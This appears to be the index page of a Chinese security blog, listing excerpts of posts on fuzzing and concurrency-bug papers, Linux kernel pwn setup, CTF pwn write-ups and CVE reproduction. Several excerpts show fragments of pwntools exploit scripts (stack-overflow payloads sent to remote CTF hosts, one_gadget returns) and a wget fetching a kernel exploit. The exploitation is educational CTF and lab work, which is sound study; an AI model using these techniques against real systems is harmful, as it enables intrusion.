-
博客迁移
博客迁移因为该框架没搞好latex的语法支持,想换个博客,重新搭到了国内的服务器上,以后更新都在新博客更新:http://zoen4n.cn/还空没搞https,有空以下一定。…
-
【论文阅读】Efficient Scalable Thread-Safety-Violation Detection --- Finding thousands of concurrency bugs during testing 阅读 & 笔记
高效的可伸缩的多线程安全违规检测 — 在测试中发现数千个并发错误摘要一般来说,并发漏洞是非常难以检测、重现和调试的,而且在内部测试中也很难找到并发漏洞,但并发漏洞一旦引爆,极有可能造成生产环境的大规模停机等糟糕后果。现有的并发漏洞检测工具不能很好地集成到现有测试环境中的原因在于没有很好地解决以下几个问题:如何处理庞大代码库中,风格各异的同步机制?如何降低工具的误报?如何尽可能的少占用测试资源?本文介绍了TSVD,这是一种线程安全违规检测器,它通过主动测试领域中的新设计点解决了这些挑战。与...…
-
【论文阅读】FuzzGuard-Filtering out Unreachable Inputs in Directed Grey-box Fuzzing through Deep Learning 阅读 & 笔记
FuzzGuard: Filtering out Unreachable Inputs in Directed Grey-box Fuzzing through Deep Learning 阅读 & 笔记同类的Fuzz工具有:aflfast和ecofuzzAbstract最近,定向灰盒模糊测试(directed grey-box fuzzing — DGF)在软件测试领域变得很流行。 与基于覆盖的模糊测试(其目标是增加代码覆盖范围以触发更多错误)不同,DGF旨在检查一段潜在的漏洞代...…
-
【论文阅读】Asm2Vec: Boosting Static Representation Robustness for Binary Clone Search against Code Obfuscation and Compiler Optimization论文翻译& 笔记
Asm2Vec的pdf版本以及LEMNA论文阅读笔记因为blog对于部分md语法转换的不是很好,下面是转换的pdf版本分享给大家。 Asm2Vec: Boosting Static Representation Robustness for Binary Clone Search against Code Obfuscation and Compiler Optimization论文翻译& 笔记 LEMNA_ Explaining Deep Learning based Sec...…
-
内核环境搭建和基础知识
内核环境搭建和基础知识拖了半年的内核学习终于开始了环境搭建参考文章: [内核pwn] 环境搭建 - 1mpossible kernel pwn初探 - 23R3Fkernel简介本质上来说也是个程序,就管理整个操作系统的程序,管理用户软件发出的数据 I/O 要求,将这些要求转义为指令,交给 CPU 和计算机中的其他组件处理kernel 最主要的功能有两点: 控制并与硬件进行交互 提供 application 能运行的环境包括 I/O,权限控制,系统调用,进程管理,内存管理等多项功能...…
-
[kernel pwn]babydriver
[kernel pwn]babydriver参考文章: https://www.anquanke.com/post/id/86490 多个kernel pwn例子讲解: https://sunichi.github.io/2019/04/29/how-to-ret2usr/ 利用详细过程:http://pwn4.fun/2017/08/15/Linux-Kernel-UAF/拿到题目如何操作一般会有三个文件: boot.sh: 一个用于启动 kernel 的 shell 的脚本,多...…
-
四月份刷题
四月份刷题2018ciscn:https://github.com/killshadow/CTF_WP/tree/master/2018ciscn/pwn2018ciscn_wp : https://www.xctf.org.cn/media/infoattach/55ec909c4c2340998be053ad70613f49.pdfhouse_of_grey参考:http://p4nda.top/2018/05/13/ciscn-ctf-2018/#house-of-grey关于clo...…
-
六月份刷题
六月Pwn刷题bugkuCTF PwnPwn1nc上去直接cat flagPwn2栈溢出,直接getshell函数from pwn import *context(os='linux',arch='amd64',log_level='debug')#p = process('./pwn2')p = remote('114.116.54.89',10003)ret_addr = 0x400751payload = 'a'*(0x30+8)+p64(ret_addr)p.sendline(pa...…
-
2019国赛华南赛区半决赛 pwn部分解
2019国赛华南赛区半决赛 pwn部分解这次比赛fix得乱七八糟,下次把插入代码的fix学会了再说,有大佬会的欢迎指点指点小弟,总体来说菜还是菜,做不出来的还是做不出来,有待提高。本次半决赛pwn题链接:https://github.com/ZoEplA/ZoEplA.github.io/tree/master/pwn/csicn2019%20Semifinalday1一道简单栈溢出分析:漏洞函数如下,非常简单,又是一道第一次泄露libc第二次跳one_gadget的题目,pwn9也是这样...…
-
starctf2019--pwn WriteUp
starctf2019–pwn WriteUppwnquicksortgets危险函数明显栈溢出,s与ptr的距离是0x1c,可以通过gets函数直接改写ptr来泄露地址,利用puts泄露libc地址,然后再改写__stack_chk_fail_got直接getshell。详细代码如下:from pwn import *local = 0if local: p = process("./quicksort") libc = ELF("/lib/i386-linux-gnu/libc.so....…
-
第十二届全国大学生信息安全竞赛 WriteUp
第十二届全国大学生信息安全竞赛 WriteUpyour_pwn在函数sub_B35里面,没有对index(v1)进行检查,从而造成任意地址泄露和任意地址更改。直接改返回地址为one_gadget即可 for ( i = 0; i <= 40; ++i ) { puts("input index"); __isoc99_scanf("%d", &v1); printf("now value(hex) %x\n", (unsigned int)v4[v1])...…
-
pwn中的IO_FILE从入门到深入
pwn中的IO_FILE从入门到深入湖湘杯2018本来周五好好学了一下house of orange,大概了解了一下如何伪造IO_FILE来进行利用,某次比赛愣是死在了如何逆这个傻逼的正则匹配上,然后各种想办法想泄露地址。。方向就错了,然后也想过伪造IO_FILE来做,因为之前还没理解好,愣是没去做,今天看wp发现这简直就是伪造IO_FILE做pwn利用的hello world啊。那我们就从这道题目讲起IO_FILE。这是一道匹配正则表达式的题目,但其实重点不在匹配上面,而是stdin和s...…
-
csicn2019国赛pwn --- bms
csicn2019国赛pwn — bms这题居然是tcache,一堆2.23的libc之后,来了个2.26。好吧,之前有做过这种结构体放在heap上的题,也是tcache,一时没反应过来,之后还得去补补tcache的题啊。。利用思路:这道题的主要漏洞在于利用tcache机制并且free后没有清零造成double free可以实现任意地址写的操作,主要难点在于泄露libc。远端环境是libc2.26,可以使用tcache攻击,利用double free把chunk分配在stdout附近,使t...…
-
西湖论剑CTF --- pwn
西湖论剑CTF — pwnstory这道题有两个漏洞点,一个是格式化字符串,一个是stack overflow,这两个洞结合基本就成了,攻击思想就是,先用格式化字符串读取canary,然后再利用栈溢出泄露libc最后ret2libc就可以了,下面是漏洞点:# bug 1char *add(){ char *v0; // ST08_8 char s; // [rsp+10h] [rbp-40h] unsigned __int64 v3; // [rsp+48h] [rbp-8h] ...…
-
数据处理(numpy & pandas & scipy & matplotlib.pyplot)
数据处理(numpy & pandas & scipy & matplotlib.pyplot)numpy参考网址:https://www.jianshu.com/p/57e3c0a92f3a啥都解释了:https://zhuanlan.zhihu.com/p/20878530小知识点 迭代对象与迭代器:https://blog.csdn.net/jinixin/article/details/72232604my_list_iter = iter(my_list...…
-
三月刷题记录
三月刷题记录 http://westerns.tokyo/writeups/0ctf2018quals.html#0ctf-quals-2018-writeup topchunk是放在<main_arena+88>里的。 堆溢出的六种利用方法:http://www.pwndog.top/2018/09/11/%E5%A0%86%E6%BA%A2%E5%87%BA%E7%9A%84%E5%85%AD%E7%A7%8D%E5%88%A9%E7%94%A8%E6%89%8B%E...…
-
CVE-2017-16995 & CVE-2017-11882 etc . CVE漏洞复现记录
漏洞复现参考链接:https://github.com/B1eed/VulRecCVE-2017-16995 Ubuntu16.04参考学习链接:https://zhuanlan.zhihu.com/p/35247850影响版本: Linux内核:Linux Kernel Version 4.14 ~ 4.4 Ubuntu版本:16.04.01~ 16.04.04测试命令:cat /proc/version执行命令:wget http://cyseclabs.com/pub/upstrea...…
-
AFL 遗传算法部分
AFL 遗传算法部分遗传算法介绍参考:https://www.zhihu.com/question/23293449介绍遗传算法(Genetic Algorithm)遵循『适者生存』、『优胜劣汰』的原则,是一类借鉴生物界自然选择和自然遗传机制的随机化搜索算法。遗传算法模拟一个人工种群的进化过程,通过选择(Selection)、交叉(Crossover)以及变异(Mutation)等机制,在每次迭代中都保留一组候选个体,重复此过程,种群经过若干代进化后,理想情况下其适应度达到近似最优的状态。...…
-
tctf2019 Elements & zerotask & babyaegis
tctf2019 Elements & zerotask & babyaegis https://github.com/ray-cp/ctf-pwn/tree/master/0ctf2019 http://blog.leanote.com/post/xp0int/%5BPwn%5D-zerotask-Cpt.shao这次比赛只做出了一道re。。赛后复现了两道pwn,记录一下。 Elements 这道题目的是输入一串字符满足一定的条件,成功输出flag即为成功...…
-
csaw2018_pwn_wp
csaw2018_pwn_wppwnget_it非常简单的直接栈溢出控制返回地址到system函数直接getshellfrom pwn import *context.log_level = "debug"local = 0if local: p = process("./get_it") elf = process("./get_it")else: p = remote("pwn.chal.csaw.io",9001) elf = process("./get_it")p.recvunt...…